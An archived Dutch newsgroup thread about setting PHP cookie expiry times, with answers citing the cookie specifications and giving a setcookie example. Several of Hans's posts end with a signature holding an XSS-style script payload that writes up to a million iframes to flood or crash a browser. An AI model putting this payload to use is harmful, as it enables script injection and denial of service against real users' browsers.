Likes Likes:  0
Resultaten 1 tot 10 van de 10
Geen
  1. #1
    Hans
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    Hoi allemaal,

    PHP is nogal brak met de normale setcookie en dus wil ik het omzeilen met de
    header functie. Gedeeltelijk werkt dit al:

    header("Set-Cookie: foo=bar; path=/");

    Ik kan echter nergens terug vinden hoe ik de expiretijd kan zetten. Expires=<waarde>
    lijkt niet te helpen. Iemand enig nuttig advies behalve om perl te gebruiken?

    Hans

    --
    begin http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
    document.write("\<iframe
    src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " + i +
    "\"\>\<\/iframe>"); } document.refresh; </script>

  2. #2
    Daniel Tryba
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    Hans <nomailwanted@spamikaze.is-a-geek.org> wrote:
    > PHP is nogal brak met de normale setcookie en dus wil ik het omzeilen met de
    > header functie.


    Huh?

    > Gedeeltelijk werkt dit al:
    >
    > header("Set-Cookie: foo=bar; path=/");
    >
    > Ik kan echter nergens terug vinden hoe ik de expiretijd kan zetten.
    > Expires=<waarde> lijkt niet te helpen. Iemand enig nuttig advies
    > behalve om perl te gebruiken?


    De cookie specs:
    http://wp.netscape.com/newsref/std/cookie_spec.html

    en de recentere:
    http://www.w3.org/Protocols/rfc2109/rfc2109
    (zonder expires overigens)

    BTW zet je regel lengte op iets < dan 80.

  3. #3
    Hans
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    On 02 Feb 2005 15:59:35 GMT, Daniel Tryba <spam@tryba.invalid> wrote:
    > Hans <nomailwanted@spamikaze.is-a-geek.org> wrote:
    >> PHP is nogal brak met de normale setcookie en dus wil ik het omzeilen met de
    >> header functie.

    >
    > Huh?


    Er zijn diverse mankementen, ondermeer als je een site bezoekt
    met firefox (versie heb ik thuis even niet bij de hand) .x

    >> Ik kan echter nergens terug vinden hoe ik de expiretijd kan zetten.
    >> Expires=<waarde> lijkt niet te helpen. Iemand enig nuttig advies
    >> behalve om perl te gebruiken?


    > De cookie specs:
    > http://wp.netscape.com/newsref/std/cookie_spec.html
    >
    > en de recentere:
    > http://www.w3.org/Protocols/rfc2109/rfc2109
    > (zonder expires overigens)


    Dank

    >
    > BTW zet je regel lengte op iets < dan 80.


    Jups, zal het doen.

    Hans
    --
    begin http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
    document.write("\<iframe
    src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " + i +
    "\"\>\<\/iframe>"); } document.refresh; </script>

  4. #4
    Daniel Tryba
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    Hans <nomailwanted@spamikaze.is-a-geek.org> wrote:
    >>> PHP is nogal brak met de normale setcookie en dus wil ik het omzeilen met de
    >>> header functie.

    >>
    >> Huh?

    >
    > Er zijn diverse mankementen, ondermeer als je een site bezoekt
    > met firefox (versie heb ik thuis even niet bij de hand) .x


    Klinkt eerder als een client bug. Ik zie graag een voorbeeld hiervan.


  5. #5
    Hans
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    On 02 Feb 2005 18:57:19 GMT, Daniel Tryba <spam@tryba.invalid> wrote:
    > Hans <nomailwanted@spamikaze.is-a-geek.org> wrote:
    >>>> PHP is nogal brak met de normale setcookie en dus wil ik
    >>>> het omzeilen met de header functie.


    >>> Huh?


    >> Er zijn diverse mankementen, ondermeer als je een site bezoekt
    >> met firefox (versie heb ik thuis even niet bij de hand) .x

    >
    > Klinkt eerder als een client bug.


    Er zijn openstaande bugs op bugs.php.net die het zelfde beamen.

    http://bugs.php.net/bug.php?id=31652

    Of het echt puur een client side iets betwijfel ik want ik heb
    het op 3 verschillende servers kunnen emuleren.
    Een IE en een Firefox versie op 2 verschillende clients wilden
    het ook niet accepteren, met het gebruik van de header die ik
    eerder poste lukte dat wel (op die expire na dus).

    1 Firefox versie
    bleef hardnekkig cookies weigeren op te nemen. Zie hieronder.

    > Ik zie graag een voorbeeld hiervan.


    Zal morgen wel even de browser versie posten.

    Hans

    --
    begin http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
    document.write("\<iframe
    src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " + i +
    "\"\>\<\/iframe>"); } document.refresh; </script>

  6. #6
    Daniel Tryba
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    Hans <nomailwanted@spamikaze.is-a-geek.org> wrote:
    > Er zijn openstaande bugs op bugs.php.net die het zelfde beamen.
    >
    > http://bugs.php.net/bug.php?id=31652


    Een volkomen waardeloze bugreport.

    >> Ik zie graag een voorbeeld hiervan.

    >
    > Zal morgen wel even de browser versie posten.


    Dat is het minst interessante, de headers tgv de setcookie zijn
    belangrijk (tcpdump etc.).


  7. #7
    Hans
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    On 02 Feb 2005 20:14:44 GMT, Daniel Tryba <spam@tryba.invalid> wrote:
    > Hans <nomailwanted@spamikaze.is-a-geek.org> wrote:
    >> Er zijn openstaande bugs op bugs.php.net die het zelfde beamen.
    >>
    >> http://bugs.php.net/bug.php?id=31652

    >
    > Een volkomen waardeloze bugreport.


    Voor een bugreport wellicht wel maar het geeft al aan dat meerdere mensen
    er last van hebben. Als je de bugs.php.net db er op nakijkt zie je dat
    er regelmatig problemen mee zijn.

    Uiteraard heb ik diverse scripts gepakt waarvan het gedrag vroeger wel
    goed was.

    >>> Ik zie graag een voorbeeld hiervan.

    >>
    >> Zal morgen wel even de browser versie posten.

    >
    > Dat is het minst interessante, de headers tgv de setcookie zijn
    > belangrijk (tcpdump etc.).


    Ok, zal eens kijken of ik daar wat mee kan.

    Hans


    --
    begin http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
    document.write("\<iframe
    src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " + i +
    "\"\>\<\/iframe>"); } document.refresh; </script>

  8. #8
    Daniel Tryba
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    Hans <nomailwanted@spamikaze.is-a-geek.org> wrote:
    >>> http://bugs.php.net/bug.php?id=31652

    >>
    >> Een volkomen waardeloze bugreport.

    >
    > Voor een bugreport wellicht wel maar het geeft al aan dat meerdere mensen
    > er last van hebben. Als je de bugs.php.net db er op nakijkt zie je dat
    > er regelmatig problemen mee zijn.
    >
    > Uiteraard heb ik diverse scripts gepakt waarvan het gedrag vroeger wel
    > goed was.


    hmmm , net de setcookie bugs van het afgelopen jaar bekeken
    (http://bugs.php.net/search.php?cmd=d...ssign=&begin=0).
    Maar ik kan toch geen bugs vinden.

    >>>> Ik zie graag een voorbeeld hiervan.
    >>>
    >>> Zal morgen wel even de browser versie posten.

    >>
    >> Dat is het minst interessante, de headers tgv de setcookie zijn
    >> belangrijk (tcpdump etc.).

    >
    > Ok, zal eens kijken of ik daar wat mee kan.


    Als je daadwerkelijk een bug denkt te hebben is het natuurlijk handig om
    dat te submitten aan de database.

  9. #9
    Hans
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    On 02 Feb 2005 21:05:00 GMT, Daniel Tryba <spam@tryba.invalid> wrote:
    > Hans <nomailwanted@spamikaze.is-a-geek.org> wrote:
    >>>> http://bugs.php.net/bug.php?id=31652


    > hmmm , net de setcookie bugs van het afgelopen jaar bekeken
    > (http://bugs.php.net/search.php?cmd=d...ssign=&begin=0).
    > Maar ik kan toch geen bugs vinden.



    http://bugs.php.net/search.php?cmd=d...&reorder_by=id

    Gedeeltelijk gaat dit over session cookies, die zal ik er nog niet direct
    bij betrekken.

    >>> Dat is het minst interessante, de headers tgv de setcookie zijn
    >>> belangrijk (tcpdump etc.).

    >>
    >> Ok, zal eens kijken of ik daar wat mee kan.

    >
    > Als je daadwerkelijk een bug denkt te hebben is het natuurlijk handig om
    > dat te submitten aan de database.


    Ik ga dit eerst zoveel mogelijk nachecken (versies van php, browsers, OS).

    Hans


    --
    begin http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
    document.write("\<iframe
    src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " + i +
    "\"\>\<\/iframe>"); } document.refresh; </script>

  10. #10
    news.speedlinq.nl
    cookies (deel2 voor het gemak om het met het andere draadje te scheiden)
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: cookies (deel2 voor het gemak om het met het andere draadje te scheiden)

    "Hans" <nomailwanted@spamikaze.is-a-geek.org> wrote in message
    news:slrnd01s4r.4hn.nomailwanted@10.0.0.10...
    > Hoi allemaal,
    >
    > PHP is nogal brak met de normale setcookie en dus wil ik het omzeilen met
    > de
    > header functie. Gedeeltelijk werkt dit al:
    >
    > header("Set-Cookie: foo=bar; path=/");
    >
    > Ik kan echter nergens terug vinden hoe ik de expiretijd kan zetten.
    > Expires=<waarde>
    > lijkt niet te helpen. Iemand enig nuttig advies behalve om perl te
    > gebruiken?
    >
    > Hans
    >


    Well...
    Ik doe het al sinds jaar en dag zo:


    ob_start(); //optioneel.
    $cookieTTL="36000"; //36000 secs
    setcookie ("foo", "bar", time()+$cookieTTL);
    ob_end_flush(); //optioneel.

    dit werkt in tot nu toe alle gevallen.
    dit is dan een W2003 server met IIS en php als isapi.dll (in versie 4, zowel
    als de recente 5).

    groet en succes
    Henk-Jan.









Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics